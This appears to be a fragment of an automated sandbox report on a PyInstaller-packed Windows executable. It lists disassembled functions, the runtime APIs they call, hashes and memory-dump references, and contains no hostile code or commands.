                                                                                                                                                                                                                                                                    • API ID: Token$FreeInformationLocalProcess$CloseConvertCurrentErrorHandleLastOpenString
                                                                                                                                                                                                                                                                    • String ID: D:(A;;FA;;;%s)$D:(A;;FA;;;%s)(A;;FA;;;%s)$S-1-3-4$Security descriptor string length exceeds PYI_PATH_MAX!
                                                                                                                                                                                                                                                                    • API String ID: 6828938-1529539262
                                                                                                                                                                                                                                                                    • Opcode ID: 44a76ac2d965b652da6d7152683ffc914eb32e79e00aec7a7a922ce7c9633e88
                                                                                                                                                                                                                                                                    • Instruction ID: 501a383dcd55afda6acac0d2fa82a9dc88a7a90b5db6c0b2e70aa9819cf72860
                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 44a76ac2d965b652da6d7152683ffc914eb32e79e00aec7a7a922ce7c9633e88
                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 25213071A0874281E710BF20E5152EAA262EF84760FD44035EA8D63F95DFBCD845C770
                                                                                                                                                                                                                                                                    Function 00007FF7C267CFD0 Relevance: 6.2, APIs: 4, Instructions: 218COMMON
                                                                                                                                                                                                                                                                    Download Yara Rule

                                                                                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                                                                                    • Executed
                                                                                                                                                                                                                                                                    • Not Executed
                                                                                                                                                                                                                                                                    control_flow_graph 963 7ff7c267cfd0-7ff7c267cff5 964 7ff7c267cffb-7ff7c267cffe 963->964 965 7ff7c267d2c3 963->965 966 7ff7c267d037-7ff7c267d063 964->966 967 7ff7c267d000-7ff7c267d032 call 7ff7c267a884 964->967 968 7ff7c267d2c5-7ff7c267d2d5 965->968 970 7ff7c267d06e-7ff7c267d074 966->970 971 7ff7c267d065-7ff7c267d06c 966->971 967->968 973 7ff7c267d076-7ff7c267d07f call 7ff7c267c390 970->973 974 7ff7c267d084-7ff7c267d099 call 7ff7c268398c 970->974 971->967 971->970 973->974 978 7ff7c267d1b3-7ff7c267d1bc 974->978 979 7ff7c267d09f-7ff7c267d0a8 974->979 980 7ff7c267d1be-7ff7c267d1c4 978->980 981 7ff7c267d210-7ff7c267d235 WriteFile 978->981 979->978 982 7ff7c267d0ae-7ff7c267d0b2 979->982 985 7ff7c267d1fc-7ff7c267d20e call 7ff7c267ca88 980->985 986 7ff7c267d1c6-7ff7c267d1c9 980->986 983 7ff7c267d237-7ff7c267d23d GetLastError 981->983 984 7ff7c267d240 981->984 987 7ff7c267d0b4-7ff7c267d0bc call 7ff7c2674830 982->987 988 7ff7c267d0c3-7ff7c267d0ce 982->988 983->984 992 7ff7c267d243 984->992 1007 7ff7c267d1a0-7ff7c267d1a7 985->1007 993 7ff7c267d1cb-7ff7c267d1ce 986->993 994 7ff7c267d1e8-7ff7c267d1fa call 7ff7c267cca8 986->994 987->988 989 7ff7c267d0d0-7ff7c267d0d9 988->989 990 7ff7c267d0df-7ff7c267d0f4 GetConsoleMode 988->990 989->978 989->990 997 7ff7c267d1ac 990->997 998 7ff7c267d0fa-7ff7c267d100 990->998 1000 7ff7c267d248 992->1000 1001 7ff7c267d254-7ff7c267d25e 993->1001 1002 7ff7c267d1d4-7ff7c267d1e6 call 7ff7c267cb8c 993->1002 994->1007 997->978 1005 7ff7c267d189-7ff7c267d19b call 7ff7c267c610 998->1005 1006 7ff7c267d106-7ff7c267d109 998->1006 1008 7ff7c267d24d 1000->1008 1009 7ff7c267d2bc-7ff7c267d2c1 1001->1009 1010 7ff7c267d260-7ff7c267d265 1001->1010 1002->1007 1005->1007 1013 7ff7c267d10b-7ff7c267d10e 1006->1013 1014 7ff7c267d114-7ff7c267d122 1006->1014 1007->1000 1008->1001 1009->968 1015 7ff7c267d267-7ff7c267d26a 1010->1015 1016 7ff7c267d293-7ff7c267d29d 1010->1016 1013->1008 1013->1014 1020 7ff7c267d124 1014->1020 1021 7ff7c267d180-7ff7c267d184 1014->1021 1022 7ff7c267d26c-7ff7c267d27b 1015->1022 1023 7ff7c267d283-7ff7c267d28e call 7ff7c2674f34 1015->1023 1018 7ff7c267d2a4-7ff7c267d2b3 1016->1018 1019 7ff7c267d29f-7ff7c267d2a2 1016->1019 1018->1009 1019->965 1019->1018 1025 7ff7c267d128-7ff7c267d13f call 7ff7c2683a58 1020->1025 1021->992 1022->1023 1023->1016 1029 7ff7c267d177-7ff7c267d17d GetLastError 1025->1029 1030 7ff7c267d141-7ff7c267d14d 1025->1030 1029->1021 1031 7ff7c267d16c-7ff7c267d173 1030->1031 1032 7ff7c267d14f-7ff7c267d161 call 7ff7c2683a58 1030->1032 1031->1021 1033 7ff7c267d175 1031->1033 1032->1029 1036 7ff7c267d163-7ff7c267d16a 1032->1036 1033->1025 1036->1031
                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                    • GetConsoleMode.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF7C267CFBB), ref: 00007FF7C267D0EC
                                                                                                                                                                                                                                                                    • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF7C267CFBB), ref: 00007FF7C267D177
                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                    • Source File: 00000004.00000002.1720329401.00007FF7C2661000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7C2660000, based on PE: true
                                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1720292059.00007FF7C2660000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1720417432.00007FF7C268B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1720455917.00007FF7C269E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1720455917.00007FF7C26A2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1720520244.00007FF7C26A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_4_2_7ff7c2660000_X9g8L63QGs.jbxd
                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                    • API ID: ConsoleErrorLastMode
                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                    • API String ID: 953036326-0
                                                                                                                                                                                                                                                                    • Opcode ID: 6e58aef6e17acf8d0a0aea0d946e1cce7a25eacb923cf4c64ad3114965f560b8
                                                                                                                                                                                                                                                                    • Instruction ID: a5b4f627d52cf9dde25abc511b57ba8bcfc515a55e6494ff97cd77da564f9d56
                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 6e58aef6e17acf8d0a0aea0d946e1cce7a25eacb923cf4c64ad3114965f560b8
                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 3391C226A1865185F750BF65E4802BDABE2AB44FA8F944535DE8E73F84CFB8D442C730
                                                                                                                                                                                                                                                                    Function 00007FF7C2675698 Relevance: 6.1, APIs: 4, Instructions: 90fileCOMMON
                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                    • Source File: 00000004.00000002.1720329401.00007FF7C2661000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7C2660000, based on PE: true
                                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1720292059.00007FF7C2660000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1720417432.00007FF7C268B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1720455917.00007FF7C269E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1720455917.00007FF7C26A2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1720520244.00007FF7C26A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_4_2_7ff7c2660000_X9g8L63QGs.jbxd
                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                    • API ID: CloseCreateFileHandle_invalid_parameter_noinfo
                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                    • API String ID: 1279662727-0
                                                                                                                                                                                                                                                                    • Opcode ID: bf36874ab91a00f02a28b4fbd79205fddfb0159c1c162080bddd18248f81d06a
                                                                                                                                                                                                                                                                    • Instruction ID: da5c33fd950796afd40a7cb3253b1ab66723926da7e83c5d5a300bda850eb57c
                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: bf36874ab91a00f02a28b4fbd79205fddfb0159c1c162080bddd18248f81d06a
                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 0F417122D1878183E650BF20A554379A361FB94B64F509335EAD816FD2DFBCA5E0C770
                                                                                                                                                                                                                                                                    Function 00007FF7C266CCAC Relevance: 4.6, APIs: 3, Instructions: 94COMMON
                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                    • Source File: 00000004.00000002.1720329401.00007FF7C2661000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7C2660000, based on PE: true
                                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1720292059.00007FF7C2660000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1720417432.00007FF7C268B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1720455917.00007FF7C269E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1720455917.00007FF7C26A2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1720520244.00007FF7C26A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_4_2_7ff7c2660000_X9g8L63QGs.jbxd
                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                    • API ID: __scrt_acquire_startup_lock__scrt_dllmain_crt_thread_attach__scrt_get_show_window_mode__scrt_release_startup_lock
                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                    • API String ID: 3251591375-0
                                                                                                                                                                                                                                                                    • Opcode ID: bd18f10481fc1cc14ce46c2a249e6ab71ba61d2437927de899b0ff225cfe2228
                                                                                                                                                                                                                                                                    • Instruction ID: 2af43a21fc74c0dd2b4060972e7336cc958d749b6054f2b772889b8c6f5dd35c
                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: bd18f10481fc1cc14ce46c2a249e6ab71ba61d2437927de899b0ff225cfe2228
                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: A6316A10E08A4281EA14BF65D4263B9A6A3AF457A8FC44434D5CE67FD7CEFCA404C278
                                                                                                                                                                                                                                                                    Function 00007FF7C2679AA0 Relevance: 4.5, APIs: 3, Instructions: 14COMMON
                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                    • Source File: 00000004.00000002.1720329401.00007FF7C2661000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7C2660000, based on PE: true
                                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1720292059.00007FF7C2660000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1720417432.00007FF7C268B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1720455917.00007FF7C269E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1720455917.00007FF7C26A2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1720520244.00007FF7C26A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_4_2_7ff7c2660000_X9g8L63QGs.jbxd
                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                    • API ID: Process$CurrentExitTerminate
                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                    • API String ID: 1703294689-0
                                                                                                                                                                                                                                                                    • Opcode ID: 230ddfbeb2cfdc83e04e02b0fbb537ff9f96aef2fd2a5ab3fdce6eee95276a48
                                                                                                                                                                                                                                                                    • Instruction ID: 3815c579f4f95a7c3e669a9c01136107ecc4226e76ec294592dce25d64e5178c
                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 230ddfbeb2cfdc83e04e02b0fbb537ff9f96aef2fd2a5ab3fdce6eee95276a48
                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 83D09E10B0A74682EB147F706C9907892936F49F61F941438C8DB7AB93DEACE449C330
                                                                                                                                                                                                                                                                    Function 00007FF7C26701AC Relevance: 3.2, APIs: 2, Instructions: 177COMMONLIBRARYCODE
                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                    • Source File: 00000004.00000002.1720329401.00007FF7C2661000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7C2660000, based on PE: true
                                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1720292059.00007FF7C2660000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1720417432.00007FF7C268B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1720455917.00007FF7C269E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1720455917.00007FF7C26A2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1720520244.00007FF7C26A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_4_2_7ff7c2660000_X9g8L63QGs.jbxd
                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                    • API ID: _invalid_parameter_noinfo
                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                    • API String ID: 3215553584-0
                                                                                                                                                                                                                                                                    • Opcode ID: e80cfa20b6c7ebf2f27a6dba6ddb06cb01cda21135ba71ef9e2cf3b7629ca058
                                                                                                                                                                                                                                                                    • Instruction ID: 617fc03ff3f9e854066d8498c3b1f98936eb5ea6fb4ea4be974dbb0a4e50e24f
                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: e80cfa20b6c7ebf2f27a6dba6ddb06cb01cda21135ba71ef9e2cf3b7629ca058
                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 2E51E562A0D24286E664BE65A40067AA293AF44FB4F944734EDFC67FC5CFBCE441C630
                                                                                                                                                                                                                                                                    Function 00007FF7C267C1A4 Relevance: 3.0, APIs: 2, Instructions: 46COMMONLIBRARYCODE
                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                    • Source File: 00000004.00000002.1720329401.00007FF7C2661000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7C2660000, based on PE: true
                                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1720292059.00007FF7C2660000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1720417432.00007FF7C268B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1720455917.00007FF7C269E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1720455917.00007FF7C26A2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1720520244.00007FF7C26A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_4_2_7ff7c2660000_X9g8L63QGs.jbxd
                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                    • API ID: ErrorFileLastPointer
                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                    • API String ID: 2976181284-0
                                                                                                                                                                                                                                                                    • Opcode ID: fe8bab274ce7bcf2293d1df97f88808174c3604892bb54168c1d2d59b6616a84
                                                                                                                                                                                                                                                                    • Instruction ID: 9166d89e9377bcecf70a000bd8166301b1c294d74d640adc35a1f1887f2ae279
                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: fe8bab274ce7bcf2293d1df97f88808174c3604892bb54168c1d2d59b6616a84
                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 8F11E261618B8181DA10AF25B804169A362BB41FF4FA40331EEBD5BBE8CFBCD001C720
                                                                                                                                                                                                                                                                    Function 00007FF7C267A9B8 Relevance: 3.0, APIs: 2, Instructions: 19memoryCOMMONLIBRARYCODE
                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                    • RtlFreeHeap.NTDLL(?,?,?,00007FF7C2682D92,?,?,?,00007FF7C2682DCF,?,?,00000000,00007FF7C2683295,?,?,?,00007FF7C26831C7), ref: 00007FF7C267A9CE
                                                                                                                                                                                                                                                                    • GetLastError.KERNEL32(?,?,?,00007FF7C2682D92,?,?,?,00007FF7C2682DCF,?,?,00000000,00007FF7C2683295,?,?,?,00007FF7C26831C7), ref: 00007FF7C267A9D8
                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                    • Source File: 00000004.00000002.1720329401.00007FF7C2661000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7C2660000, based on PE: true
                                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1720292059.00007FF7C2660000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1720417432.00007FF7C268B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1720455917.00007FF7C269E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1720455917.00007FF7C26A2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1720520244.00007FF7C26A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_4_2_7ff7c2660000_X9g8L63QGs.jbxd
                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                    • API ID: ErrorFreeHeapLast
                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                    • API String ID: 485612231-0
                                                                                                                                                                                                                                                                    • Opcode ID: 4768bb9444967098c6ff0662bce39d003f3d6bed11959a3c87c06bce48e858a7
                                                                                                                                                                                                                                                                    • Instruction ID: 183f5244b875de304ed6e6a6559b23ffe3681f5a0c09fc4672f00b92a5b50378
                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 4768bb9444967098c6ff0662bce39d003f3d6bed11959a3c87c06bce48e858a7
                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 4BE04F11F1864282FF087FB2744513992626F84B60BC40034D99DA2BA2EFAC6895C330
                                                                                                                                                                                                                                                                    Function 00007FF7C267ABC8 Relevance: 2.6, APIs: 2, Instructions: 59COMMON
                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                    • CloseHandle.KERNELBASE(?,?,?,00007FF7C267AA45,?,?,00000000,00007FF7C267AAFA), ref: 00007FF7C267AC36
                                                                                                                                                                                                                                                                    • GetLastError.KERNEL32(?,?,?,00007FF7C267AA45,?,?,00000000,00007FF7C267AAFA), ref: 00007FF7C267AC40
                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                    • Source File: 00000004.00000002.1720329401.00007FF7C2661000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7C2660000, based on PE: true
                                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1720292059.00007FF7C2660000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1720417432.00007FF7C268B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1720455917.00007FF7C269E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1720455917.00007FF7C26A2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1720520244.00007FF7C26A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_4_2_7ff7c2660000_X9g8L63QGs.jbxd
                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                    • API ID: CloseErrorHandleLast
                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                    • API String ID: 918212764-0
                                                                                                                                                                                                                                                                    • Opcode ID: 1c4273fb4a414bd16749861b25ace672462e960675883ae7dbf138385109c950
                                                                                                                                                                                                                                                                    • Instruction ID: d11c77f138bbff2ebabcbba1e267ad5e276477d45bdcd46752a540659b9a8099
                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 1c4273fb4a414bd16749861b25ace672462e960675883ae7dbf138385109c950
                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: E0215011B1C64291EA947F61B45427D9293AF84FB0F984235DAAEA7BD1CFFCA845C330
                                                                                                                                                                                                                                                                    Function 00007FF7C267BF1C Relevance: 1.6, APIs: 1, Instructions: 112COMMONLIBRARYCODE
                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                    • Source File: 00000004.00000002.1720329401.00007FF7C2661000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7C2660000, based on PE: true
                                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1720292059.00007FF7C2660000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1720417432.00007FF7C268B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1720455917.00007FF7C269E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1720455917.00007FF7C26A2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1720520244.00007FF7C26A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_4_2_7ff7c2660000_X9g8L63QGs.jbxd
                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                    • API ID: _invalid_parameter_noinfo
                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                    • API String ID: 3215553584-0
                                                                                                                                                                                                                                                                    • Opcode ID: 83fd655adac635c1bfef66338e564e5d3c087748e58eff1a34e14c1f5e77bb28
                                                                                                                                                                                                                                                                    • Instruction ID: a524dea2fd5443b9b605d2abb9b29dfd3c99ee1e95fb12a2d6c3c56bcfd47aa7
                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 83fd655adac635c1bfef66338e564e5d3c087748e58eff1a34e14c1f5e77bb28
                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: E641B53290864187EA34BE25B54027DB3A2EB55F64F900135DACEA3B95CFADE442CB71
                                                                                                                                                                                                                                                                    Function 00007FF7C2667F80 Relevance: 1.6, APIs: 1, Instructions: 85COMMON
                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                    • Source File: 00000004.00000002.1720329401.00007FF7C2661000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7C2660000, based on PE: true
                                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1720292059.00007FF7C2660000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1720417432.00007FF7C268B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1720455917.00007FF7C269E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1720455917.00007FF7C26A2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1720520244.00007FF7C26A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_4_2_7ff7c2660000_X9g8L63QGs.jbxd
                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                    • API ID: _fread_nolock
                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                    • API String ID: 840049012-0
                                                                                                                                                                                                                                                                    • Opcode ID: a04a6dff0443a84ee3e7d7b85ba5df040c793d2a730aad3af21426add8a99984
                                                                                                                                                                                                                                                                    • Instruction ID: cd73bec62f283a293e7dc0aaf6d897f8531808d6072ab5a9e6e6a478bd517c0c
                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: a04a6dff0443a84ee3e7d7b85ba5df040c793d2a730aad3af21426add8a99984
                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 3621A521B0869195EE10BE2265043BAE662BF45BE4FCC5430EE8D27B86CEBDE045C634
                                                                                                                                                                                                                                                                    Function 00007FF7C267B9AC Relevance: 1.6, APIs: 1, Instructions: 79COMMONLIBRARYCODE
                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                    • Source File: 00000004.00000002.1720329401.00007FF7C2661000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7C2660000, based on PE: true
                                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1720292059.00007FF7C2660000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1720417432.00007FF7C268B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1720455917.00007FF7C269E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1720455917.00007FF7C26A2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1720520244.00007FF7C26A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_4_2_7ff7c2660000_X9g8L63QGs.jbxd
                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                    • API ID: _invalid_parameter_noinfo
                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                    • API String ID: 3215553584-0
                                                                                                                                                                                                                                                                    • Opcode ID: 2d5c35b5412ec9e3d722ee101ab37b91f6ea8aa9dcca92d1d4e84e7f868c2b8f
                                                                                                                                                                                                                                                                    • Instruction ID: 2047142ebe03a124250fb7c8311e13d22de2ff8ee8584a4d41f06ab39dcd6330
                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 2d5c35b5412ec9e3d722ee101ab37b91f6ea8aa9dcca92d1d4e84e7f868c2b8f
                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: B6318022A18A4285F7517F65A84137CA662AB80FB4FC54135EAAD23BD2DFFCE441C731
                                                                                                                                                                                                                                                                    Function 00007FF7C26799D1 Relevance: 1.6, APIs: 1, Instructions: 61COMMON
                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                    Memory Dump Source
